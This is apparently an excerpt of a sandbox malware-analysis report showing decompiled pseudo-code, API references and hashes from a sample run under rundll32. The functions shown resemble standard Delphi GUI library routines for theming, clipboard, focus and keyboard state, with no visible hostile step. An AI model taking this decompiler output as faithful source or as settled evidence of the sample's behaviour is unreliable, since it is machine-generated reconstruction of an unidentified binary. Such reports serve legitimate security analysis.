                          											_t133 =  *(_v8 + 0x220);
                          											__eflags = _t133;
                          											if(_t133 != 0) {
                          												__eflags = _t133 - _v8;
                          												if(_t133 != _v8) {
                          													_t256 = E00E5CFE0(_t133);
                          												}
                          											}
                          										} else {
                          											_t136 = E00E428D8(_v8);
                          											__eflags = _t136;
                          											if(_t136 != 0) {
                          												_t256 = E00E5CFE0(E00E428D8(_v8));
                          											}
                          										}
                          										__eflags = _t256;
                          										if(_t256 == 0) {
                          											goto L43;
                          										} else {
                          											_t92 = SetFocus(_t256);
                          										}
                          									}
                          								}
                          							}
                          							goto L44;
                          						} else {
                          							_t232 = _t231 - 0x22;
                          							if(_t232 == 0) {
                          								_v24 = __edx[2];
                          								__eflags = _v24->i - 1;
                          								if(_v24->i != 1) {
                          									goto L43;
                          								} else {
                          									_t142 = _v8;
                          									__eflags =  *(_t142 + 0x248);
                          									if( *(_t142 + 0x248) == 0) {
                          										goto L43;
                          									} else {
                          										_t250 = E00E50074( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
                          										__eflags = _t250;
                          										if(_t250 == 0) {
                          											goto L43;
                          										} else {
                          											_v16 = E00E30840(0, 1);
                          											_push(_t259);
                          											_push(0xe42225);
                          											_push( *[fs:eax]);
                          											 *[fs:eax] = _t262;
                          											_v12 = SaveDC( *(_v24 + 0x18));
                          											_push(_t259);
                          											_push(0xe42208);
                          											_push( *[fs:eax]);
                          											 *[fs:eax] = _t262;
                          											E00E30DFC(_v16,  *(_v24 + 0x18));
                          											E00E30C9C(_v16);
                          											E00E5155C(_t250, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
                          											_pop(_t238);
                          											 *[fs:eax] = _t238;
                          											_push(0xe4220f);
                          											__eflags = 0;
                          											E00E30DFC(_v16, 0);
                          											return RestoreDC( *(_v24 + 0x18), _v12);
                          										}
                          									}
                          								}
                          							} else {
                          								if(_t232 == 1) {
                          									_t257 = __edx[2];
                          									__eflags = _t257->i - 1;
                          									if(_t257->i != 1) {
                          										goto L43;
                          									} else {
                          										_t172 = _v8;
                          										__eflags =  *(_t172 + 0x248);
                          										if( *(_t172 + 0x248) == 0) {
                          											goto L43;
                          										} else {
                          											_t251 = E00E50074( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t257 + 8)));
                          											__eflags = _t251;
                          											if(_t251 == 0) {
                          												goto L43;
                          											} else {
                          												_v20 = GetWindowDC(E00E5CFE0(_v8));
                          												 *[fs:eax] = _t262;
                          												_v16 = E00E30840(0, 1);
                          												 *[fs:eax] = _t262;
                          												_v12 = SaveDC(_v20);
                          												 *[fs:eax] = _t262;
                          												E00E30DFC(_v16, _v20);
                          												E00E30C9C(_v16);
                          												 *((intOrPtr*)(_t251->i + 0x38))(_t257 + 0x10,  *[fs:eax], 0xe4230f, _t259,  *[fs:eax], 0xe4232c, _t259,  *[fs:eax], 0xe42353, _t259);
                          												_pop(_t246);
                          												 *[fs:eax] = _t246;
                          												_push(0xe42316);
                          												__eflags = 0;
                          												E00E30DFC(_v16, 0);
                          												return RestoreDC(_v20, _v12);
                          											}
                          										}
                          									}
                          								} else {
                          									L41:
                          									_t268 = _t92 -  *0xe7fb28; // 0xc075
                          									if(_t268 == 0) {
                          										E00E57A98(_v8, 0, 0xb025, 0);
                          										E00E57A98(_v8, 0, 0xb024, 0);
                          										E00E57A98(_v8, 0, 0xb035, 0);
                          										E00E57A98(_v8, 0, 0xb009, 0);
                          										E00E57A98(_v8, 0, 0xb008, 0);
                          										E00E57A98(_v8, 0, 0xb03d, 0);
                          									}
                          									L43:
                          									_t92 = E00E5A9F4(_v8, _t201);
                          									L44:
                          									return _t92;
                          								}
                          							}
                          						}
                          					}
                          				}
                           			}

                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                           • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: RestoreSave$FocusWindow
                          • String ID:
                          • API String ID: 1553564791-0
                          • Opcode ID: b51b803be91febbfeca545cdbdb9fde13a952b6057b5cc269574ab845bf4f53a
                          • Instruction ID: c7dd368aac99d56279161f2ec6fd5262d75b6bfef8dcb14cba67071caa76a723
                          • Opcode Fuzzy Hash: b51b803be91febbfeca545cdbdb9fde13a952b6057b5cc269574ab845bf4f53a
                          • Instruction Fuzzy Hash: 77B19F35A00205DFDB15DF68E896AAEB7F5EF49304FA564A8F904BB361C734AE40DB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E00E37170(void* __edi, struct HWND__* _a4, signed int _a8) {
                          				struct _WINDOWPLACEMENT _v48;
                          				void* __ebx;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t19;
                          				intOrPtr _t21;
                          				struct HWND__* _t23;
                          
                          				_t19 = _a8;
                          				_t23 = _a4;
                          				if( *0xe7f91d != 0) {
                          					if((_t19 & 0x00000003) == 0) {
                          						if(IsIconic(_t23) == 0) {
                          							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
                          						} else {
                          							GetWindowPlacement(_t23,  &_v48);
                          						}
                          						return E00E370E0( &(_v48.rcNormalPosition), _t19);
                          					}
                          					return 0x12340042;
                          				}
                          				_t21 =  *0xe7f8f8; // 0xe37170
                          				 *0xe7f8f8 = E00E36F70(1, _t19, _t21, __edi, _t23);
                          				return  *0xe7f8f8(_t23, _t19);
                           			}

                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                           • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc
                          • String ID: MonitorFromWindow$pq
                          • API String ID: 190572456-709896079
                          • Opcode ID: 01d8752898e48be8b44666c4b1963bfc7e3c6713148d54ef91826dbd55f9fe40
                          • Instruction ID: 69ff29b8bcee9e13808a54fdc91a12c4d4b520c545e9626702a7e2d22aa7a099
                          • Opcode Fuzzy Hash: 01d8752898e48be8b44666c4b1963bfc7e3c6713148d54ef91826dbd55f9fe40
                          • Instruction Fuzzy Hash: D601D6B25091196F9720DB54DC859FF7BECEF41354F506021F894B7201DB349E44D7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 58%
                          			E00E3C54C(void* __eax, void* __ebx, void* __edi, void* __esi) {
                          				char _v8;
                          				CHAR* _t20;
                          				long _t25;
                          				intOrPtr _t30;
                          				void* _t34;
                          				intOrPtr _t37;
                          
                          				_push(0);
                          				_t34 = __eax;
                          				_push(_t37);
                          				_push(0xe3c5c9);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t37;
                          				E00E3BFAC(__eax);
                          				_t25 = GetTickCount();
                          				do {
                          					Sleep(0);
                          				} while (GetTickCount() - _t25 <= 0x3e8);
                          				E00E3BBAC(_t34, _t25,  &_v8, 0, __edi, _t34);
                          				if(_v8 != 0) {
                          					_t20 = E00E14528(_v8);
                          					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
                          				}
                          				_pop(_t30);
                          				 *[fs:eax] = _t30;
                          				_push(0xe3c5d0);
                          				return E00E14068( &_v8);
                           			}

                          APIs
                            • Part of subcall function 00E3BFAC: WinHelpA.USER32 ref: 00E3BFBB
                          • GetTickCount.KERNEL32 ref: 00E3C56A
                          • Sleep.KERNEL32(00000000,00000000,00E3C5C9,?,?,00000000,00000000,?,00E3C542), ref: 00E3C573
                          • GetTickCount.KERNEL32 ref: 00E3C578
                          • WinHelpA.USER32 ref: 00E3C5AE
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                           • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CountHelpTick$Sleep
                          • String ID:
                          • API String ID: 2438605093-0
                          • Opcode ID: 6623b75d9d325d57e644a4ca7879a39ecc36cee1e6091956f0f56ff762448aa9
                          • Instruction ID: 9b2e52b6fcd7d175c6e78d510c5ae57d6fccd19d146334df0004e1271826bb26
                          • Opcode Fuzzy Hash: 6623b75d9d325d57e644a4ca7879a39ecc36cee1e6091956f0f56ff762448aa9
                          • Instruction Fuzzy Hash: 3A016D75700304AFE711EBA8CC5BB9DBBE9EB48B04F616461F500F6681DB74AE40D662
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E00E5A9F4(void* __eax, intOrPtr* __edx) {
                          				char _v20;
                          				char _v28;
                          				intOrPtr _t17;
                          				void* _t19;
                          				void* _t21;
                          				void* _t32;
                          				void* _t39;
                          				void* _t45;
                          				intOrPtr _t47;
                          				intOrPtr _t48;
                          				void* _t50;
                          				void* _t51;
                          				intOrPtr* _t65;
                          				intOrPtr* _t67;
                          				void* _t68;
                          
                          				_t67 = __edx;
                          				_t50 = __eax;
                          				_t17 =  *__edx;
                          				_t68 = _t17 - 0x84;
                          				if(_t68 > 0) {
                          					_t19 = _t17 + 0xffffff00 - 9;
                          					if(_t19 < 0) {
                          						_t21 = E00E57054(__eax);
                          						if(_t21 != 0) {
                          							L28:
                          							return _t21;
                          						}
                          						L27:
                          						return E00E57B64(_t50, _t67);
                          					}
                          					if(_t19 + 0xffffff09 - 0xb < 0) {
                          						_t21 = E00E5A960(__eax, _t51, __edx);
                          						if(_t21 == 0) {
                          							goto L27;
                          						}
                          						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
                          							goto L28;
                          						}
                          						_t21 = E00E5D240(_t50);
                          						if(_t21 == 0) {
                          							goto L28;
                          						}
                          						_push( *((intOrPtr*)(_t67 + 8)));
                          						_push( *((intOrPtr*)(_t67 + 4)));
                          						_push( *_t67);
                          						_t32 = E00E5CFE0(_t50);
                          						_push(_t32);
                          						L00E167F0();
                          						return _t32;
                          					}
                          					goto L27;
                          				}
                          				if(_t68 == 0) {
                          					_t21 = E00E57B64(__eax, __edx);
                          					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
                          						goto L28;
                          					}
                          					E00E16CD8( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
                          					E00E56470(_t50,  &_v28,  &_v20);
                          					_t21 = E00E5A8CC(_t50, 0,  &_v28, 0);
                          					if(_t21 == 0) {
                          						goto L28;
                          					}
                          					 *((intOrPtr*)(_t67 + 0xc)) = 1;
                          					return _t21;
                          				}
                          				_t39 = _t17 - 7;
                          				if(_t39 == 0) {
                          					_t65 = E00E3FBE8(__eax);
                          					if(_t65 == 0) {
                          						goto L27;
                          					}
                          					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))();
                          					if(_t21 == 0) {
                          						goto L28;
                          					}
                          					goto L27;
                          				}
                          				_t21 = _t39 - 1;
                          				if(_t21 == 0) {
                          					if(( *(__eax + 0x54) & 0x00000020) != 0) {
                          						goto L28;
                          					}
                          				} else {
                          					if(_t21 == 0x17) {
                          						_t45 = E00E5CFE0(__eax);
                          						if(_t45 == GetCapture() &&  *0xe7cce0 != 0) {
                          							_t47 =  *0xe7cce0; // 0x0
                          							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
                          								_t48 =  *0xe7cce0; // 0x0
                          								E00E57A98(_t48, 0, 0x1f, 0);
                          							}
                          						}
                          					}
                          				}
                          			}

0x00e5a9fa
                          0x00e5a9fc
                          0x00e5a9fe
                          0x00e5aa00
                          0x00e5aa05
                          0x00e5aa24
                          0x00e5aa27
                          0x00e5ab04
                          0x00e5ab0b
                          0x00e5ab56
                          0x00e5ab56
                          0x00e5ab56
                          0x00e5ab47
                          0x00000000
                          0x00e5ab4b
                          0x00e5aa35
                          0x00e5aace
                          0x00e5aad5
                          0x00000000
                          0x00000000
                          0x00e5aadb
                          0x00000000
                          0x00000000
                          0x00e5aadf
                          0x00e5aae6
                          0x00000000
                          0x00000000
                          0x00e5aaeb
                          0x00e5aaef
                          0x00e5aaf2
                          0x00e5aaf5
                          0x00e5aafa
                          0x00e5aafb
                          0x00000000
                          0x00e5aafb
                          0x00000000
                          0x00e5aa3b
                          0x00e5aa07
                          0x00e5aa7d
                          0x00e5aa86
                          0x00000000
                          0x00000000
                          0x00e5aa95
                          0x00e5aaa4
                          0x00e5aab1
                          0x00e5aab8
                          0x00000000
                          0x00000000
                          0x00e5aabe
                          0x00000000
                          0x00e5aabe
                          0x00e5aa09
                          0x00e5aa0c
                          0x00e5aa47
                          0x00e5aa4b
                          0x00000000
                          0x00000000
                          0x00e5aa57
                          0x00e5aa5f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00e5aa65
                          0x00e5aa0e
                          0x00e5aa0f
                          0x00e5aa6e
                          0x00000000
                          0x00000000
                          0x00e5aa11
                          0x00e5aa14
                          0x00e5ab11
                          0x00e5ab1f
                          0x00e5ab2a
                          0x00e5ab32
                          0x00e5ab3d
                          0x00e5ab42
                          0x00e5ab42
                          0x00e5ab32
                          0x00e5ab1f
                          0x00e5aa14

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Capture
                          • String ID:
                          • API String ID: 1145282425-3916222277
                          • Opcode ID: 9dc0a7a71dc8f43f59d9aa216ebe2f8146a077d73c7dc07a84b387ad62245337
                          • Instruction ID: b05172223d2db9f10f21253131d01171ca513af2fd34182e3be120a02e77ae57
                          • Opcode Fuzzy Hash: 9dc0a7a71dc8f43f59d9aa216ebe2f8146a077d73c7dc07a84b387ad62245337
                          • Instruction Fuzzy Hash: 263185313042014BC6A0AA3C8955B5A63D76B4431AF1CBF79BD5AF7296EA34DC4DC782
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E33B10(intOrPtr* __eax, void* __ecx, void* __edx) {
                          				intOrPtr _v68;
                          				intOrPtr _v72;
                          				intOrPtr _v76;
                          				struct tagENHMETAHEADER _v104;
                          				void* __ebp;
                          				intOrPtr _t35;
                          				intOrPtr* _t37;
                          				struct HENHMETAFILE__* _t43;
                          				intOrPtr _t44;
                          
                          				_t37 = __eax;
                          				_t43 = GetClipboardData(0xe);
                          				if(_t43 == 0) {
                          					_t35 =  *0xe7e148; // 0xe2dff4
                          					E00E3103C(_t35);
                          				}
                          				E00E332B0(_t37);
                          				_t44 =  *((intOrPtr*)(_t37 + 0x28));
                          				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
                          				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
                          				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
                          				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
                          				 *((short*)(_t44 + 0x18)) = 0;
                          				 *((char*)(_t37 + 0x2c)) = 1;
                          				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
                          				return  *((intOrPtr*)( *_t37 + 0x10))();
                          			}

0x00e33b19
                          0x00e33b22
                          0x00e33b26
                          0x00e33b28
                          0x00e33b2d
                          0x00e33b2d
                          0x00e33b34
                          0x00e33b39
                          0x00e33b44
                          0x00e33b51
                          0x00e33b5c
                          0x00e33b65
                          0x00e33b68
                          0x00e33b6e
                          0x00e33b7e
                          0x00e33b90

                          APIs
                          • GetClipboardData.USER32 ref: 00E33B1D
                          • CopyEnhMetaFileA.GDI32(00000000,00000000,0000000E), ref: 00E33B3F
                          • GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000,0000000E), ref: 00E33B51
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: FileMeta$ClipboardCopyDataHeader
                          • String ID:
                          • API String ID: 1752724394-0
                          • Opcode ID: 341bfb40fcb6fff8b0b08c63383112a2eb6bb4ed4a9348bec17222e7c5d9d991
                          • Instruction ID: 0030efc32d9f92b8006106454323261adb278e11d0375b6c7ca75499b98929af
                          • Opcode Fuzzy Hash: 341bfb40fcb6fff8b0b08c63383112a2eb6bb4ed4a9348bec17222e7c5d9d991
                          • Instruction Fuzzy Hash: 611139726003049FC710DFA9C885A9BBBF8AF49310F104669E948EB352DA71EC45CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E57B64(intOrPtr* __eax, signed int* __edx) {
                          				signed int _v12;
                          				short _v14;
                          				char _v16;
                          				signed int _v20;
                          				intOrPtr* _v24;
                          				char _v280;
                          				signed int _t39;
                          				signed int _t40;
                          				signed int _t46;
                          				intOrPtr* _t47;
                          				signed int _t50;
                          				signed int _t53;
                          				intOrPtr _t55;
                          				intOrPtr _t56;
                          				signed int _t67;
                          				signed int _t68;
                          				void* _t73;
                          				signed int* _t79;
                          				intOrPtr _t90;
                          				intOrPtr* _t96;
                          
                          				_t79 = __edx;
                          				_t96 = __eax;
                          				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
                          					L4:
                          					_t39 =  *_t79;
                          					if(_t39 < 0x100 || _t39 > 0x108) {
                          						_t40 =  *_t79;
                          						__eflags = _t40 - 0x200;
                          						if(_t40 < 0x200) {
                          							L30:
                          							__eflags = _t40 - 0xb00b;
                          							if(_t40 == 0xb00b) {
                          								E00E564CC(_t96, _t79[1], _t40, _t79[2]);
                          							}
                          							L32:
                          							return  *((intOrPtr*)( *_t96 - 0x14))();
                          						}
                          						__eflags = _t40 - 0x20a;
                          						if(_t40 > 0x20a) {
                          							goto L30;
                          						}
                          						__eflags =  *(_t96 + 0x50) & 0x00000080;
                          						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
                          							L16:
                          							_t46 =  *_t79 - 0x200;
                          							__eflags = _t46;
                          							if(__eflags == 0) {
                          								L21:
                          								_t47 =  *0xe7e134; // 0xe7fb1c
                          								E00E49210( *_t47, _t79, _t96, __eflags);
                          								goto L32;
                          							}
                          							_t50 = _t46 - 1;
                          							__eflags = _t50;
                          							if(_t50 == 0) {
                          								L22:
                          								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
                          								if(__eflags != 0) {
                          									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
                          									goto L32;
                          								}
                          								return E00E13470(_t96, __eflags);
                          							}
                          							_t53 = _t50 - 1;
                          							__eflags = _t53;
                          							if(_t53 == 0) {
                          								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
                          								goto L32;
                          							}
                          							__eflags = _t53 == 1;
                          							if(_t53 == 1) {
                          								goto L22;
                          							}
                          							_t55 =  *0xe7fb58; // 0xf0142c
                          							__eflags =  *((char*)(_t55 + 0x20));
                          							if( *((char*)(_t55 + 0x20)) == 0) {
                          								goto L32;
                          							} else {
                          								_t56 =  *0xe7fb58; // 0xf0142c
                          								__eflags =  *(_t56 + 0x1c);
                          								if( *(_t56 + 0x1c) == 0) {
                          									goto L32;
                          								}
                          								_t90 =  *0xe7fb58; // 0xf0142c
                          								_t25 = _t90 + 0x1c; // 0x0
                          								__eflags =  *_t79 -  *_t25;
                          								if( *_t79 !=  *_t25) {
                          									goto L32;
                          								}
                          								GetKeyboardState( &_v280);
                          								_v20 =  *_t79;
                          								_v16 = E00E3FB2C( &_v280);
                          								_v14 = _t79[1];
                          								_v12 = _t79[2];
                          								return E00E13470(_t96, __eflags);
                          							}
                          							goto L21;
                          						}
                          						_t67 = _t40 - 0x203;
                          						__eflags = _t67;
                          						if(_t67 == 0) {
                          							L15:
                          							 *_t79 =  *_t79 - 2;
                          							__eflags =  *_t79;
                          							goto L16;
                          						}
                          						_t68 = _t67 - 3;
                          						__eflags = _t68;
                          						if(_t68 == 0) {
                          							goto L15;
                          						}
                          						__eflags = _t68 != 3;
                          						if(_t68 != 3) {
                          							goto L16;
                          						}
                          						goto L15;
                          					}
                          					_v24 = E00E3FBE8(_t96);
                          					if(_v24 == 0) {
                          						goto L32;
                          					}
                          					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
                          					if(_t73 == 0) {
                          						goto L32;
                          					}
                          				} else {
                          					_v24 = E00E3FBE8(__eax);
                          					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
                          						goto L4;
                          					} else {
                          						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
                          						if(_t73 == 0) {
                          							goto L4;
                          						}
                          					}
                          				}
                          				return _t73;
                          			}

0x00e57b70
                          0x00e57b72
                          0x00e57b78
                          0x00e57bb0
                          0x00e57bb0
                          0x00e57bb7
                          0x00e57bf0
                          0x00e57bf2
                          0x00e57bf7
                          0x00e57ccf
                          0x00e57ccf
                          0x00e57cd4
                          0x00e57ce1
                          0x00e57ce1
                          0x00e57ce6
                          0x00000000
                          0x00e57cec
                          0x00e57bfd
                          0x00e57c02
                          0x00000000
                          0x00000000
                          0x00e57c08
                          0x00e57c0c
                          0x00e57c22
                          0x00e57c24
                          0x00e57c24
                          0x00e57c29
                          0x00e57c36
                          0x00e57c38
                          0x00e57c41
                          0x00000000
                          0x00e57c41
                          0x00e57c2b
                          0x00e57c2b
                          0x00e57c2c
                          0x00e57c4b
                          0x00e57c4b
                          0x00e57c4f
                          0x00e57c61
                          0x00000000
                          0x00e57c61
                          0x00000000
                          0x00e57c57
                          0x00e57c2e
                          0x00e57c2e
                          0x00e57c2f
                          0x00e57c68
                          0x00000000
                          0x00e57c68
                          0x00e57c31
                          0x00e57c32
                          0x00000000
                          0x00000000
                          0x00e57c6f
                          0x00e57c74
                          0x00e57c78
                          0x00000000
                          0x00e57c7a
                          0x00e57c7a
                          0x00e57c7f
                          0x00e57c83
                          0x00000000
                          0x00000000
                          0x00e57c87
                          0x00e57c8d
                          0x00e57c8d
                          0x00e57c90
                          0x00000000
                          0x00000000
                          0x00e57c99
                          0x00e57ca0
                          0x00e57cae
                          0x00e57cb5
                          0x00e57cbc
                          0x00000000
                          0x00e57cc8
                          0x00000000
                          0x00e57c78
                          0x00e57c0e
                          0x00e57c0e
                          0x00e57c13
                          0x00e57c1f
                          0x00e57c1f
                          0x00e57c1f
                          0x00000000
                          0x00e57c1f
                          0x00e57c15
                          0x00e57c15
                          0x00e57c18
                          0x00000000
                          0x00000000
                          0x00e57c1a
                          0x00e57c1d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00e57c1d
                          0x00e57bc7
                          0x00e57bce
                          0x00000000
                          0x00000000
                          0x00e57bdd
                          0x00e57be5
                          0x00000000
                          0x00e57beb
                          0x00e57b7a
                          0x00e57b81
                          0x00e57b88
                          0x00000000
                          0x00e57b96
                          0x00e57ba5
                          0x00e57baa
                          0x00000000
                          0x00000000
                          0x00e57baa
                          0x00e57b88
                          0x00e57cf5

                          APIs
                          • GetKeyboardState.USER32(?,?,?,?,?,00E5AB50), ref: 00E57C99
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: KeyboardState
                          • String ID:
                          • API String ID: 1724228437-0
                          • Opcode ID: 4f38dc47292e030d5d6a802f168f8a58dc3ae2a6b493f19ea39f336d66eab15f
                          • Instruction ID: bbbc82352e67441f87bbbff750a098ffbe14f1dc915ce70d0f6ef56d9d15f2c3
                          • Opcode Fuzzy Hash: 4f38dc47292e030d5d6a802f168f8a58dc3ae2a6b493f19ea39f336d66eab15f
                          • Instruction Fuzzy Hash: 634190707186058BCB21DF28E588AA9F7E1BB49306F1428A5DC85FB391C770DD98CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E19C14() {
                          				struct _SYSTEMTIME* _t2;
                          
                          				GetLocalTime(_t2);
                          				return _t2->wYear;
                          			}

0x00e19c18
                          0x00e19c24

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: LocalTime
                          • String ID:
                          • API String ID: 481472006-0
                          • Opcode ID: 5bd8844059777daa509e02a0b2b63edf7dcd71d3ac5d75e3861a93ab33053cc2
                          • Instruction ID: a28c15d9ebe26e361e3350be3ca557d0cba0e449c4181e9869db88815691c3f1
                          • Opcode Fuzzy Hash: 5bd8844059777daa509e02a0b2b63edf7dcd71d3ac5d75e3861a93ab33053cc2
                          • Instruction Fuzzy Hash: EFA0121880480101814033180C0319C30405851620FC4074078B8203D1E929016082A7
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E00E3921C(void* __ebx, void* __ecx) {
                          				char _v5;
                          				intOrPtr _t2;
                          				intOrPtr _t6;
                          				intOrPtr _t108;
                          				intOrPtr _t111;
                          
                          				_t2 =  *0xe7fa48; // 0xf00dc8
                          				E00E39014(_t2);
                          				_push(_t111);
                          				_push(0xe395cf);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t111;
                          				 *0xe7fa44 =  *0xe7fa44 + 1;
                          				if( *0xe7fa40 == 0) {
                          					 *0xe7fa40 = LoadLibraryA("uxtheme.dll");
                          					if( *0xe7fa40 > 0) {
                          						 *0xe7f980 = GetProcAddress( *0xe7fa40, "OpenThemeData");
                          						 *0xe7f984 = GetProcAddress( *0xe7fa40, "CloseThemeData");
                          						 *0xe7f988 = GetProcAddress( *0xe7fa40, "DrawThemeBackground");
                          						 *0xe7f98c = GetProcAddress( *0xe7fa40, "DrawThemeText");
                          						 *0xe7f990 = GetProcAddress( *0xe7fa40, "GetThemeBackgroundContentRect");
                          						 *0xe7f994 = GetProcAddress( *0xe7fa40, "GetThemeBackgroundContentRect");
                          						 *0xe7f998 = GetProcAddress( *0xe7fa40, "GetThemePartSize");
                          						 *0xe7f99c = GetProcAddress( *0xe7fa40, "GetThemeTextExtent");
                          						 *0xe7f9a0 = GetProcAddress( *0xe7fa40, "GetThemeTextMetrics");
                          						 *0xe7f9a4 = GetProcAddress( *0xe7fa40, "GetThemeBackgroundRegion");
                          						 *0xe7f9a8 = GetProcAddress( *0xe7fa40, "HitTestThemeBackground");
                          						 *0xe7f9ac = GetProcAddress( *0xe7fa40, "DrawThemeEdge");
                          						 *0xe7f9b0 = GetProcAddress( *0xe7fa40, "DrawThemeIcon");
                          						 *0xe7f9b4 = GetProcAddress( *0xe7fa40, "IsThemePartDefined");
                          						 *0xe7f9b8 = GetProcAddress( *0xe7fa40, "IsThemeBackgroundPartiallyTransparent");
                          						 *0xe7f9bc = GetProcAddress( *0xe7fa40, "GetThemeColor");
                          						 *0xe7f9c0 = GetProcAddress( *0xe7fa40, "GetThemeMetric");
                          						 *0xe7f9c4 = GetProcAddress( *0xe7fa40, "GetThemeString");
                          						 *0xe7f9c8 = GetProcAddress( *0xe7fa40, "GetThemeBool");
                          						 *0xe7f9cc = GetProcAddress( *0xe7fa40, "GetThemeInt");
